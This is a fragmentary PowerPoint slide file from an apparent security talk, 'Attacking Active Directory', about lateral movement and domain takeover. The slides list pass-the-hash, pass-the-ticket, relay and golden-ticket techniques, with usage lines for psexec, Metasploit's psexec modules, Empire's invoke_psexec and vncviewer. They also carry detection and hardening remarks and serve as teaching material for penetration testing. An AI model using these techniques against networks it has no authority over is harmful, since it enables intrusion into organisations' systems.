            <a:off x="1393637" y="397184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E4F993-C545-4388-BAA6-B9F3FC3F05A8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="183374" y="221333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E7A9FA-F3CF-4BE7-A3C2-3D5112F47027}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1962614" y="157625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89988-DBBF-426B-B022-44C77A294621}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3475896" y="2679849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46626-8119-4EDD-9968-699815511B90}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3775519" y="176091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7AF95-D51B-481B-B676-88C74B7A177F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3775519" y="4333751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1F4BFB-6AA8-43D3-A191-097A6F8A6D69}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4413703" y="5301606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7D4DD1-C36B-4D30-BC95-6DA41FF81AEF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6189993" y="3576335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 of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37F64D-DB5D-441B-9B7E-38E7BBB331E0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8458932" y="3870692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Access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E9769F-990A-494F-A77B-6612E4C1FAAD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:endCxn id="42" idx="5"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="6604864" y="5084389"/>
            <a:ext cx="1419712" cy="98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D87F1C6-E23C-40CE-AB91-E468FE21A52C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6511395" y="5116940"/>
            <a:ext cx="162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Access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FD1A6D-499B-487B-94BB-944448D3A82B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8893289" y="5396877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 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7ED58F-C0CF-4112-BB26-650A82495877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52745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343AC-0FC2-4DD6-9CFC-5FE2E9F5B0B3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2849003" y="2275111"/>
            <a:ext cx="6142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Lets Begin</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1882233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343AC-0FC2-4DD6-9CFC-5FE2E9F5B0B3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2849003" y="2275111"/>
            <a:ext cx="61425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Lateral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4BD79-49D0-4B45-99DC-AD7606BC9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9686"/>
            <a:ext cx="3192761" cy="4823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7532B5-52FF-449C-B4C7-DBAFC10C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99241" y="1139686"/>
            <a:ext cx="3192761" cy="48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9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776D5-4C3A-47E8-8528-7B4D7D1B956F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9900737" y="6555328"/>
            <a:ext cx="2397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https://www.smokescreen.io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65ACD9-4F4B-4485-BF08-7AAE7F19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797" y="1676566"/>
            <a:ext cx="7662203" cy="4507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AE5D5-616C-413E-A8E9-0FD5BCFFD846}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1833380"/>
            <a:ext cx="47126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2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Where attackers are spending time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110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0" y="1833380"/>
            <a:ext cx="47126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attackers are spending time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2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Abusing stolen credentials </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="C2FC32"/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776D5-4C3A-47E8-8528-7B4D7D1B956F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5654181" y="6555328"/>
            <a:ext cx="664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https://cloudblogs.microsoft.com/microsoftsecure/2016/11/28/disrupting-the-kill-chain/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4399C-5ECE-477B-AB88-D7FCDE9F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73" y="1663149"/>
            <a:ext cx="7658627" cy="44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06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C6F7-025A-4B77-85F2-6DAA83802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0"/>
            <a:ext cx="9063244" cy="3329581"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Attacking Active Directory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BD925-0EA9-49D4-8B76-805472C58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5414054"/>
            <a:ext cx="8825658" cy="1350885"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Ryan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>preston</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" cap="none" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr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C36EFD4-DE63-4972-9265-43E89FE2F352}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1090786" y="3559661"/>
            <a:ext cx="10595888" cy="14615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Level 4: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>PWNING the domain</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3545196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0" y="1833380"/>
            <a:ext cx="471267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attackers are spending time</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Abusing stolen credentials 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C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Using Built-in Tools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776D5-4C3A-47E8-8528-7B4D7D1B956F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4639634" y="6555328"/>
            <a:ext cx="7658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https://www.peerlyst.com/posts/popular-attacker-tools-and-techniques-survey-results-bart-blaze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56882-467C-4A1B-A2D7-59073DDB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73" y="1602156"/>
            <a:ext cx="7658627" cy="44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22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0" y="1833380"/>
            <a:ext cx="47126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attackers are spending time</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Abusing stolen credentials </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Using Built-in Tools</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>*no ‘exploits’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776D5-4C3A-47E8-8528-7B4D7D1B956F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4639634" y="6555328"/>
            <a:ext cx="7658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https://www.peerlyst.com/posts/popular-attacker-tools-and-techniques-survey-results-bart-blaze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56882-467C-4A1B-A2D7-59073DDB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73" y="1602156"/>
            <a:ext cx="7658627" cy="44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61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7" y="473206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Toolz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3775496" y="5242172"/>
            <a:ext cx="7337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Pass-the-hash + variations</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Pass-the-ticket + variations</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Relay Attacks (responder/inveigh)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>WMI - Windows Management Instrumentation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Default Creds!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9BE6C-4904-47FC-9FF7-83021A337B6E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8514826" y="6581001"/>
            <a:ext cx="376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https://attack.mitre.org/wiki/Lateral_Movement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9B9DD3-C78B-41A0-AA32-65AAEC751BC8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="51016" y="2578425"/>
            <a:ext cx="30245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Telnet/SSH/FTP </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Remote Ctrl Services</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Admin </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Shares~net</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> use</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Psexec</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Silver Tickets</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Golden Tickets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D1E66-CADC-4B88-B286-4B49C73B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95" y="1145949"/>
            <a:ext cx="6863008" cy="40317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FCF926-93C9-47B4-A74C-6EE2B6627DB5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9810320" y="2578425"/>
            <a:ext cx="24119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Psexec</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>SMBexec</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>DCOM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VNC/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Teamviewer</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Remote Desktop</a:t>
            </a:r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EA2FFF-02C0-4C31-AA00-1451D05B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3554070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RDP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630CE57-5FD0-4A7D-8F33-F2F860A5A370}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="406086" y="1558979"/>
            <a:ext cx="9750787" cy="41363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dirty="0"/>
              <a:t>Try to avoid, kicks off current user if used on a workstation.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFont typeface="Wingdings 3" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>BUT</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFont typeface="Wingdings 3" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Servers will allow </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>multiple RDP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>connections!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFont typeface="Wingdings 3" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="C2FC32"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFont typeface="Wingdings 3" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Use</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>rdeskop</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>on kali</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFont typeface="Wingdings 3" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFont typeface="Wingdings 3" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFont typeface="Wingdings 3" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>*Doesn’t require local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75E25-5BC0-48B7-B3C6-8A1D95E5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54" y="3157786"/>
            <a:ext cx="5952520" cy="37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0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VNC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A052E4-2CC5-4E6A-AFBF-D691881789CB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="406086" y="1649090"/>
            <a:ext cx="9743753" cy="13969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i="1" dirty="0"/>
              <a:t>Can be found without authentication enabled</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFont typeface="Wingdings 3" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>vncviewer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t> - built into kali </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>linux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFont typeface="Wingdings 3" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFont typeface="Wingdings 3" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Usage:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFont typeface="Wingdings 3" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>vncviewer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t> &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/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03F6D-D34B-4EA7-942C-56F71A33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344" y="3212493"/>
            <a:ext cx="8675656" cy="364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1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SysInternals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19E39C8-A682-4CF6-8A31-932AD047E6D7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="223006" y="1761235"/>
            <a:ext cx="3958575" cy="41363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SysInternals</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> “Live”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/>
              <a:t>Useful to launch </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>SysInternal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Tools on hosts.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b="1" dirty="0"/>
              <a:t>Usage: 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hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://live.sysinternals.com/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>   in the File Explorer address bar.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14B22-5FE8-489F-9743-1F506714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539" y="1576300"/>
            <a:ext cx="7797513" cy="50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Psexec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E4040B-43C3-437A-A917-9437FEC02634}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="194231" y="1789035"/>
            <a:ext cx="11348311" cy="30742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A part of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>SysInternals</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> by Microsoft.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hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://docs.microsoft.com/en-us/sysinternals/</a:t>
            </a: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/>
              <a:t>Requires Local Administrator privileges.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rgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>*Can be detected easily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Leaves log events. Creates a PSEXESVC service temporarily on the remote machine.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4BF61-AFA3-46B4-8540-9BA796E0C9F2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6576646" y="1994686"/>
            <a:ext cx="58859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dirty="0"/>
              <a:t>Usage: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>psexec.exe \\&lt;ComputerOrIP&gt; –u &lt;USER&gt; -p &lt;PASSWORD&gt; cmd.exe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0B91C-5D7A-44F7-B9BF-9B7E293C7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8965"/>
            <a:ext cx="12130597" cy="17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3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Psexec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1E1E1F5-D230-4FE5-9BD4-8B4C0F9E90FE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="262012" y="1229687"/>
            <a:ext cx="11069514" cy="25434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dirty="0"/>
              <a:t>In Metasploit </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFont typeface="Wingdings 3" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>&gt;use exploit/windows/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>smb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>psexec</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFont typeface="Wingdings 3" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>&gt;use exploit/windows/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>smb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>psexec_psh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>       *Powershell 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13009-4A8A-402F-932F-33581215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33" y="2782787"/>
            <a:ext cx="9595726" cy="397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8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Psexec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6356EE-171C-4139-B250-508D4C350C33}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="339383" y="1511041"/>
            <a:ext cx="10330961" cy="8452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dirty="0"/>
              <a:t>In Empire:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFont typeface="Wingdings 3" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>usemodule</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>powershell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>lateral_movement</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>invoke_psexec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1EDEF-32A3-4B96-8727-4A135012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2" y="3346805"/>
            <a:ext cx="11822195" cy="35111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100F7D-797E-43C4-BA0E-5A7D7FDF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1734132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latin typeface="Titillium Web" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Powershell Remoting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7DD77E1-1FB0-489E-BAF7-B258863E0FA3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="260251" y="1385135"/>
            <a:ext cx="11931749" cy="52053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400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>The Microsoft recommended way for remote administration.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Uses </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>WinRM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>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MSFT’s implementation of Web Services for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Mgmt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> (WS-Management)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Not the same as adding -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ComputerName</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> to any cmdlet (that usually uses RPC)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Runs as a service under the Network Service account, spawns as an isolated process.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" strike="sngStrike" dirty="0"/>
              <a:t>Can</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> Should be setup to use Just Enough Administration (JEA)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Verbose Logging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DOESN’T BRING CREDENTIALS WITH YOU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……</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0"/>
              <a:t>unless you use it wrong i.e. enabled </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1"/>
              <a:t>credSSP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1"/>
              <a:t>RunAsCredential</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0"/>
              <a:t> parameter, etc.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ABF9B9-9055-4F2D-AF4D-8AAF2B64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F569E-B015-43EF-A57E-8DE44F4AF753}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5300000" y="6590447"/>
            <a:ext cx="68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https://docs.microsoft.com/en-us/powershell/scripting/setup/winrmsecurity?view=powershell-6</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="55462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Level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6B0F7-43A3-4EA4-BA12-B0F98B2D6652}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
